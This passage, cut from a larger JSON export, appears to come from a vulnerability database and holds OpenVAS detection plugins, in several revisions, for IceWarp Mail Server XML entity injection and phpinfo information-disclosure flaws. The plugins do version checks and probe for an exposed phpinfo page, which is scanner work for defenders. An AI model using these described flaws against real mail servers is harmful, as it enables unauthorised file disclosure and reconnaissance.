2}}, "objectVersion": "1.4", "pluginID": "103279", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_IceWarp_49753.nasl 6696 2017-07-12 11:30:15Z cfischer $\n#\n# IceWarp Web Mail Multiple Information Disclosure Vulnerabilities\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_summary = \"IceWarp Web Mail is prone to multiple information-disclosure\nvulnerabilities.\n\nAttackers can exploit these issues to gain access to potentially\nsensitive information, and possibly cause denial-of-service\nconditions; other attacks may also be possible.\";\n\ntag_solution = \"Vendor updates are available. Please see the references for more\ninformation.\";\n\nif (description)\n{\n script_id(103279);\n script_version(\"$Revision: 6696 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-12 13:30:15 +0200 (Wed, 12 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-09-28 12:51:43 +0200 (Wed, 28 Sep 2011)\");\n script_bugtraq_id(49753);\n script_cve_id(\"CVE-2011-3579\",\"CVE-2011-3580\");\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:P\");\n\n script_name(\"IceWarp Web Mail Multiple Information Disclosure Vulnerabilities\");\n\n script_xref(name : \"URL\" , value : \"http://www.securityfocus.com/bid/49753\");\n script_xref(name : \"URL\" , value : \"http://www.icewarp.com/Products/IceWarp_Web_Mail/\");\n script_xref(name : \"URL\" , value : \"https://www.trustwave.com/spiderlabs/advisories/TWSL2011-013.txt\");\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_copyright(\"This script is Copyright (C) 2011 Greenbone Networks GmbH\");\n script_dependencies(\"gb_get_http_banner.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"IceWarp/banner\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"http_keepalive.inc\");\n\nport = get_http_port(default:80);\nif(!can_host_php(port:port))exit(0);\n\nbanner = get_http_banner(port:port);\nif(!banner || \"IceWarp\" >!< banner)exit(0);\n\nforeach dir( make_list_unique( \"/webmail\", cgi_dirs( port:port ) ) ) {\n\n if( dir == \"/\" ) dir = \"\";\n url = string(dir, \"/server/\"); \n\n if(http_vuln_check(port:port, url:url,pattern:\"<title>phpinfo\$\$\")) {\n report = report_vuln_url( port:port, url:url );\n security_message( port:port, data:report );\n exit( 0 );\n }\n}\n\nexit( 99 );", "naslFamily": "Web application abuses", "_object_type": "robots.models.openvas.OpenVASBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.openvas.OpenVASBulletin"]}, {"id": "OPENVAS:1361412562310902478", "hash": "eaf2aeb885d8cdb55837eafc6214d366", "type": "openvas", "bulletinFamily": "scanner", "title": "IceWarp Mail Server XML Entity Injection and Information Disclosure Vulnerability", "description": "The host is running IceWarp Mail Server and is prone to xml entity injection\nand information disclosure vulnerability.\n\nThe flaws are due to:\n\n - Certain input passed via SOAP messages to ", "published": "2011-09-27T00:00:00", "modified": "2018-10-20T00:00:00", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:P"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310902478", "reporter": "Copyright (c) 2011 SecPod", "references": ["http://xforce.iss.net/xforce/xfdb/70025", "http://secunia.com/advisories/46135/", "http://packetstormsecurity.org/files/view/105320/TWSL2011-013.txt", "http://xforce.iss.net/xforce/xfdb/70026", "http://www.icewarp.com"], "cvelist": ["CVE-2011-3580", "CVE-2011-3579"], "lastseen": "2019-05-29T18:39:28", "history": [{"bulletin": {"id": "OPENVAS:1361412562310902478", "hash": "835f491ff63f70fe04f02cc4b94a361130aecd9aa5e136b2889ca5c1dc4a7cf9", "type": "openvas", "bulletinFamily": "scanner", "title": "IceWarp Mail Server XML Entity Injection and Information Disclosure Vulnerability", "description": "The host is running IceWarp Mail Server and is prone to xml entity injection\nand information disclosure vulnerability.\n\nThe flaws are due to:\n\n- Certain input passed via SOAP messages to ", "published": "2011-09-27T00:00:00", "modified": "2017-08-29T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310902478", "reporter": "Copyright (c) 2011 SecPod", "references": ["http://xforce.iss.net/xforce/xfdb/70025", "http://secunia.com/advisories/46135/", "http://packetstormsecurity.org/files/view/105320/TWSL2011-013.txt", "http://xforce.iss.net/xforce/xfdb/70026"], "cvelist": ["CVE-2011-3580", "CVE-2011-3579"], "lastseen": "2018-08-30T19:27:11", "history": [], "viewCount": 1, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "objectVersion": "1.4", "pluginID": "1361412562310902478", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_icewarp_mail_server_xml_inj_n_info_disc_vuln.nasl 7016 2017-08-29 03:14:59Z ckuersteiner $\n#\n# IceWarp Mail Server XML Entity Injection and Information Disclosure Vulnerability\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2011 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:icewarp:mail_server\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.902478\");\n script_version(\"$Revision: 7016 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-08-29 05:14:59 +0200 (Tue, 29 Aug 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-09-27 17:29:53 +0200 (Tue, 27 Sep 2011)\");\n script_cve_id(\"CVE-2011-3579\", \"CVE-2011-3580\");\n script_bugtraq_id(49753);\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:P\");\n script_name(\"IceWarp Mail Server XML Entity Injection and Information Disclosure Vulnerability\");\n script_xref(name: \"URL\" , value: \"http://secunia.com/advisories/46135/\");\n script_xref(name: \"URL\" , value: \"http://xforce.iss.net/xforce/xfdb/70026\");\n script_xref(name: \"URL\" , value: \"http://xforce.iss.net/xforce/xfdb/70025\");\n script_xref(name: \"URL\" , value: \"http://packetstormsecurity.org/files/view/105320/TWSL2011-013.txt\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 SecPod\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_icewarp_web_detect.nasl\");\n script_require_keys(\"icewarp/installed\");\n\n script_tag(name: \"impact\", value: \"Successful exploitation will allow attacker to gain access to potentially\nsensitive information, and possibly cause denial-of-service conditions. Other attacks may also be possible.\n\nImpact Level: Application\");\n\n script_tag(name: \"affected\", value: \"IceWarp Mail Server 10.3.2 and prior.\");\n\n script_tag(name: \"solution\", value: \"Upgrade to IceWarp Mail Server 10.3.3 or later, For updates refer to\nhttp://www.icewarp.com\");\n\n script_tag(name: \"summary\", value: \"The host is running IceWarp Mail Server and is prone to xml entity injection\nand information disclosure vulnerability.\n\nThe flaws are due to:\n\n- Certain input passed via SOAP messages to 'server/webmail.php' is not properly verified before being used. This\ncan be exploited to disclose the contents of arbitrary files.\n\n- An unspecified script, which calls the 'phpinfo()' function, is stored with insecure permissions inside the web\nroot. This can be exploited to gain knowledge of sensitive information.\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif (!port = get_app_port(cpe: CPE, service: \"www\"))\n exit(0);\n\n## Get the version from kb\nif (!icewarp = get_app_version(cpe:CPE, port:port))\n exit(0);\n\n## Check for IceWarp Mail Server version < 10.3.3\nif (version_is_less(version: icewarp, test_version: \"10.3.3\")) {\n report = report_fixed_ver(installed_version: icewarp, fixed_version: \"10.3.3\");\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(99);\n", "naslFamily": "Web application abuses"}, "differentElements": ["cvss"], "edition": 3, "lastseen": "2018-08-30T19:27:11"}, {"bulletin": {"id": "OPENVAS:1361412562310902478", "hash": "74692b642742475d61bfdf561f892b574620f5f87dae76ce614966353d2259b5", "type": "openvas", "bulletinFamily": "scanner", "title": "IceWarp Mail Server XML Entity Injection and Information Disclosure Vulnerability", "description": "The host is running IceWarp Mail Server and is prone to xml entity injection\nand information disclosure vulnerability.\n\nThe flaws are due to:\n\n- Certain input passed via SOAP messages to ", "published": "2011-09-27T00:00:00", "modified": "2017-08-29T00:00:00", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:PARTIAL/"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310902478", "reporter": "Copyright (c) 2011 SecPod", "references": ["http://xforce.iss.net/xforce/xfdb/70025", "http://secunia.com/advisories/46135/", "http://packetstormsecurity.org/files/view/105320/TWSL2011-013.txt", "http://xforce.iss.net/xforce/xfdb/70026"], "cvelist": ["CVE-2011-3580", "CVE-2011-3579"], "lastseen": "2017-09-04T14:19:34", "history": [], "viewCount": 1, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "objectVersion": "1.4", "pluginID": "1361412562310902478", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_icewarp_mail_server_xml_inj_n_info_disc_vuln.nasl 7016 2017-08-29 03:14:59Z ckuersteiner $\n#\n# IceWarp Mail Server XML Entity Injection and Information Disclosure Vulnerability\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2011 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:icewarp:mail_server\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.902478\");\n script_version(\"$Revision: 7016 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-08-29 05:14:59 +0200 (Tue, 29 Aug 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-09-27 17:29:53 +0200 (Tue, 27 Sep 2011)\");\n script_cve_id(\"CVE-2011-3579\", \"CVE-2011-3580\");\n script_bugtraq_id(49753);\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:P\");\n script_name(\"IceWarp Mail Server XML Entity Injection and Information Disclosure Vulnerability\");\n script_xref(name: \"URL\" , value: \"http://secunia.com/advisories/46135/\");\n script_xref(name: \"URL\" , value: \"http://xforce.iss.net/xforce/xfdb/70026\");\n script_xref(name: \"URL\" , value: \"http://xforce.iss.net/xforce/xfdb/70025\");\n script_xref(name: \"URL\" , value: \"http://packetstormsecurity.org/files/view/105320/TWSL2011-013.txt\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 SecPod\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_icewarp_web_detect.nasl\");\n script_require_keys(\"icewarp/installed\");\n\n script_tag(name: \"impact\", value: \"Successful exploitation will allow attacker to gain access to potentially\nsensitive information, and possibly cause denial-of-service conditions. Other attacks may also be possible.\n\nImpact Level: Application\");\n\n script_tag(name: \"affected\", value: \"IceWarp Mail Server 10.3.2 and prior.\");\n\n script_tag(name: \"solution\", value: \"Upgrade to IceWarp Mail Server 10.3.3 or later, For updates refer to\nhttp://www.icewarp.com\");\n\n script_tag(name: \"summary\", value: \"The host is running IceWarp Mail Server and is prone to xml entity injection\nand information disclosure vulnerability.\n\nThe flaws are due to:\n\n- Certain input passed via SOAP messages to 'server/webmail.php' is not properly verified before being used. This\ncan be exploited to disclose the contents of arbitrary files.\n\n- An unspecified script, which calls the 'phpinfo()' function, is stored with insecure permissions inside the web\nroot. This can be exploited to gain knowledge of sensitive information.\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif (!port = get_app_port(cpe: CPE, service: \"www\"))\n exit(0);\n\n## Get the version from kb\nif (!icewarp = get_app_version(cpe:CPE, port:port))\n exit(0);\n\n## Check for IceWarp Mail Server version < 10.3.3\nif (version_is_less(version: icewarp, test_version: \"10.3.3\")) {\n report = report_fixed_ver(installed_version: icewarp, fixed_version: \"10.3.3\");\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(99);\n", "naslFamily": "Web application abuses"}, "differentElements": ["cvss"], "edition": 2, "lastseen": "2017-09-04T14:19:34"}, {"bulletin": {"id": "OPENVAS:1361412562310902478", "hash": "fc3a894cd58fb5ccf7c1584b34ac7be55e4f872991bc55149866d01e763d7d7d", "type": "openvas", "bulletinFamily": "scanner", "title": "IceWarp Mail Server XML Entity Injection and Information Disclosure Vulnerability", "description": "The host is running IceWarp Mail Server and is prone to xml entity injection\nand information disclosure vulnerability.\n\nThe flaws are due to:\n\n - Certain input passed via SOAP messages to ", "published": "2011-09-27T00:00:00", "modified": "2018-10-20T00:00:00", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:PARTIAL/"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310902478", "reporter": "Copyright (c) 2011 SecPod", "references": ["http://xforce.iss.net/xforce/xfdb/70025", "http://secunia.com/advisories/46135/", "http://packetstormsecurity.org/files/view/105320/TWSL2011-013.txt", "http://xforce.iss.net/xforce/xfdb/70026", "http://www.icewarp.com"], "cvelist": ["CVE-2011-3580", "CVE-2011-3579"], "lastseen": "2018-10-22T16:44:19", "history": [], "viewCount": 1, "enchantments": {"dependencies": {"modified": "2018-10-22T16:44:19", "references": [{"idList": ["EDB-ID:36165"], "type": "exploitdb"}, {"idList": ["CVE-2011-3580", "CVE-2011-3579"], "type": "cve"}, {"idList": ["SECURITYVULNS:DOC:27071", "SECURITYVULNS:VULN:11920"], "type": "securityvulns"}, {"idList": ["OPENVAS:103279", "OPENVAS:1361412562310103279"], "type": "openvas"}, {"idList": ["PACKETSTORM:105320"], "type": "packetstorm"}]}, "score": {"value": 5.0, "vector": "NONE"}}, "objectVersion": "1.4", "pluginID": "1361412562310902478", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_icewarp_mail_server_xml_inj_n_info_disc_vuln.nasl 11997 2018-10-20 11:59:41Z mmartin $\n#\n# IceWarp Mail Server XML Entity Injection and Information Disclosure Vulnerability\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2011 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:icewarp:mail_server\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.902478\");\n script_version(\"$Revision: 11997 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-20 13:59:41 +0200 (Sat, 20 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2011-09-27 17:29:53 +0200 (Tue, 27 Sep 2011)\");\n script_cve_id(\"CVE-2011-3579\", \"CVE-2011-3580\");\n script_bugtraq_id(49753);\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:P\");\n script_name(\"IceWarp Mail Server XML Entity Injection and Information Disclosure Vulnerability\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/46135/\");\n script_xref(name:\"URL\", value:\"http://xforce.iss.net/xforce/xfdb/70026\");\n script_xref(name:\"URL\", value:\"http://xforce.iss.net/xforce/xfdb/70025\");\n script_xref(name:\"URL\", value:\"http://packetstormsecurity.org/files/view/105320/TWSL2011-013.txt\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 SecPod\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_icewarp_web_detect.nasl\");\n script_mandatory_keys(\"icewarp/installed\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attacker to gain access to potentially\nsensitive information, and possibly cause denial-of-service conditions. Other attacks may also be possible.\");\n\n script_tag(name:\"affected\", value:\"IceWarp Mail Server 10.3.2 and prior.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to IceWarp Mail Server 10.3.3 or later.\");\n\n script_tag(name:\"summary\", value:\"The host is running IceWarp Mail Server and is prone to xml entity injection\nand information disclosure vulnerability.\n\nThe flaws are due to:\n\n - Certain input passed via SOAP messages to 'server/webmail.php' is not properly verified before being used. This\ncan be exploited to disclose the contents of arbitrary files.\n\n - An unspecified script, which calls the 'phpinfo()' function, is stored with insecure permissions inside the web\nroot. This can be exploited to gain knowledge of sensitive information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://www.icewarp.com\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif (!port = get_app_port(cpe: CPE, service: \"www\"))\n exit(0);\n\nif (!icewarp = get_app_version(cpe:CPE, port:port))\n exit(0);\n\nif (version_is_less(version: icewarp, test_version: \"10.3.3\")) {\n report = report_fixed_ver(installed_version: icewarp, fixed_version: \"10.3.3\");\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(99);\n", "naslFamily": "Web application abuses"}, "differentElements": ["cvss"], "edition": 6, "lastseen": "2018-10-22T16:44:19"}, {"bulletin": {"id": "OPENVAS:1361412562310902478", "hash": "a832aca8bbce2f5a5ce2a6254879b9f106075187645ea6cb73340926352e7b9d", "type": "openvas", "bulletinFamily": "scanner", "title": "IceWarp Mail Server XML Entity Injection and Information Disclosure Vulnerability", "description": "The host is running IceWarp Mail Server and is prone to xml entity\n injection and information disclosure vulnerability.\n\n Vulnerability:\n The flaws are due to\n - Certain input passed via SOAP messages to 'server/webmail.php' is not\n properly verified before being used. This can be exploited to disclose the\n contents of arbitrary files.\n - An unspecified script, which calls the 'phpinfo()' function, is stored with\n insecure permissions inside the web root. This can be exploited to gain\n knowledge of sensitive information.", "published": "2011-09-27T00:00:00", "modified": "2016-04-19T00:00:00", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:PARTIAL/"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310902478", "reporter": "Copyright (c) 2011 SecPod", "references": ["http://xforce.iss.net/xforce/xfdb/70025", "http://secunia.com/advisories/46135/", "http://packetstormsecurity.org/files/view/105320/TWSL2011-013.txt", "http://xforce.iss.net/xforce/xfdb/70026"], "cvelist": ["CVE-2011-3580", "CVE-2011-3579"], "lastseen": "2017-07-02T21:13:27", "history": [], "viewCount": 0, "enchantments": {}, "objectVersion": "1.4", "pluginID": "1361412562310902478", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_icewarp_mail_server_xml_inj_n_info_disc_vuln.nasl 3114 2016-04-19 10:07:15Z benallard $\n#\n# IceWarp Mail Server XML Entity Injection and Information Disclosure Vulnerability\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2011 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_summary = \"The host is running IceWarp Mail Server and is prone to xml entity\n injection and information disclosure vulnerability.\n\n Vulnerability:\n The flaws are due to\n - Certain input passed via SOAP messages to 'server/webmail.php' is not\n properly verified before being used. This can be exploited to disclose the\n contents of arbitrary files.\n - An unspecified script, which calls the 'phpinfo()' function, is stored with\n insecure permissions inside the web root. This can be exploited to gain\n knowledge of sensitive information.\";\n\ntag_impact = \"Successful exploitation will allow attacker to gain access to potentially\n sensitive information, and possibly cause denial-of-service conditions. other\n attacks may also be possible.\n Impact Level: Application\";\ntag_affected = \"IceWarp Mail Server 10.3.2 and prior.\";\ntag_solution = \"Upgrade to IceWarp Mail Server 10.3.3 or later,\n For updates refer to http://www.icewarp.com\";\n\nSCRIPT_OID = \"1.3.6.1.4.1.25623.1.0.902478\";\nCPE = \"cpe:/a:icewarp:merak_mail_server\";\n\nif(description)\n{\n script_oid(SCRIPT_OID);\n script_version(\"$Revision: 3114 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2016-04-19 12:07:15 +0200 (Tue, 19 Apr 2016) $\");\n script_tag(name:\"creation_date\", value:\"2011-09-27 17:29:53 +0200 (Tue, 27 Sep 2011)\");\n script_cve_id(\"CVE-2011-3579\", \"CVE-2011-3580\");\n script_bugtraq_id(49753);\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:P\");\n script_name(\"IceWarp Mail Server XML Entity Injection and Information Disclosure Vulnerability\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/46135/\");\n script_xref(name : \"URL\" , value : \"http://xforce.iss.net/xforce/xfdb/70026\");\n script_xref(name : \"URL\" , value : \"http://xforce.iss.net/xforce/xfdb/70025\");\n script_xref(name : \"URL\" , value : \"http://packetstormsecurity.org/files/view/105320/TWSL2011-013.txt\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_summary(\"Check for the version of IceWarp Mail Server\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 SecPod\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_merak_mail_server_detect.nasl\");\n script_require_keys(\"MerakMailServer/Ver\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!port = get_app_port(cpe:CPE, nvt:SCRIPT_OID))exit(0);\n\n## Get the version from kb\nicewarp = get_app_version(cpe:CPE, nvt:SCRIPT_OID, port:port);\nif(!icewarp){\n exit(0);\n}\n\n## Check for IceWarp Mail Server version < 10.3.3\nif(version_is_less(version:icewarp, test_version:\"10.3.3\")){\n security_message(port:port);\n}\n", "naslFamily": "Web application abuses"}, "differentElements": ["description", "modified", "sourceData"], "edition": 1, "lastseen": "2017-07-02T21:13:27"}, {"bulletin": {"id": "OPENVAS:1361412562310902478", "hash": "74692b642742475d61bfdf561f892b574620f5f87dae76ce614966353d2259b5", "type": "openvas", "bulletinFamily": "scanner", "title": "IceWarp Mail Server XML Entity Injection and Information Disclosure Vulnerability", "description": "The host is running IceWarp Mail Server and is prone to xml entity injection\nand information disclosure vulnerability.\n\nThe flaws are due to:\n\n- Certain input passed via SOAP messages to ", "published": "2011-09-27T00:00:00", "modified": "2017-08-29T00:00:00", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:PARTIAL/"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310902478", "reporter": "Copyright (c) 2011 SecPod", "references": ["http://xforce.iss.net/xforce/xfdb/70025", "http://secunia.com/advisories/46135/", "http://packetstormsecurity.org/files/view/105320/TWSL2011-013.txt", "http://xforce.iss.net/xforce/xfdb/70026"], "cvelist": ["CVE-2011-3580", "CVE-2011-3579"], "lastseen": "2018-09-02T00:02:46", "history": [], "viewCount": 1, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "objectVersion": "1.4", "pluginID": "1361412562310902478", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_icewarp_mail_server_xml_inj_n_info_disc_vuln.nasl 7016 2017-08-29 03:14:59Z ckuersteiner $\n#\n# IceWarp Mail Server XML Entity Injection and Information Disclosure Vulnerability\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2011 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:icewarp:mail_server\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.902478\");\n script_version(\"$Revision: 7016 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-08-29 05:14:59 +0200 (Tue, 29 Aug 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-09-27 17:29:53 +0200 (Tue, 27 Sep 2011)\");\n script_cve_id(\"CVE-2011-3579\", \"CVE-2011-3580\");\n script_bugtraq_id(49753);\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:P\");\n script_name(\"IceWarp Mail Server XML Entity Injection and Information Disclosure Vulnerability\");\n script_xref(name: \"URL\" , value: \"http://secunia.com/advisories/46135/\");\n script_xref(name: \"URL\" , value: \"http://xforce.iss.net/xforce/xfdb/70026\");\n script_xref(name: \"URL\" , value: \"http://xforce.iss.net/xforce/xfdb/70025\");\n script_xref(name: \"URL\" , value: \"http://packetstormsecurity.org/files/view/105320/TWSL2011-013.txt\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 SecPod\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_icewarp_web_detect.nasl\");\n script_require_keys(\"icewarp/installed\");\n\n script_tag(name: \"impact\", value: \"Successful exploitation will allow attacker to gain access to potentially\nsensitive information, and possibly cause denial-of-service conditions. Other attacks may also be possible.\n\nImpact Level: Application\");\n\n script_tag(name: \"affected\", value: \"IceWarp Mail Server 10.3.2 and prior.\");\n\n script_tag(name: \"solution\", value: \"Upgrade to IceWarp Mail Server 10.3.3 or later, For updates refer to\nhttp://www.icewarp.com\");\n\n script_tag(name: \"summary\", value: \"The host is running IceWarp Mail Server and is prone to xml entity injection\nand information disclosure vulnerability.\n\nThe flaws are due to:\n\n- Certain input passed via SOAP messages to 'server/webmail.php' is not properly verified before being used. This\ncan be exploited to disclose the contents of arbitrary files.\n\n- An unspecified script, which calls the 'phpinfo()' function, is stored with insecure permissions inside the web\nroot. This can be exploited to gain knowledge of sensitive information.\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif (!port = get_app_port(cpe: CPE, service: \"www\"))\n exit(0);\n\n## Get the version from kb\nif (!icewarp = get_app_version(cpe:CPE, port:port))\n exit(0);\n\n## Check for IceWarp Mail Server version < 10.3.3\nif (version_is_less(version: icewarp, test_version: \"10.3.3\")) {\n report = report_fixed_ver(installed_version: icewarp, fixed_version: \"10.3.3\");\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(99);\n", "naslFamily": "Web application abuses"}, 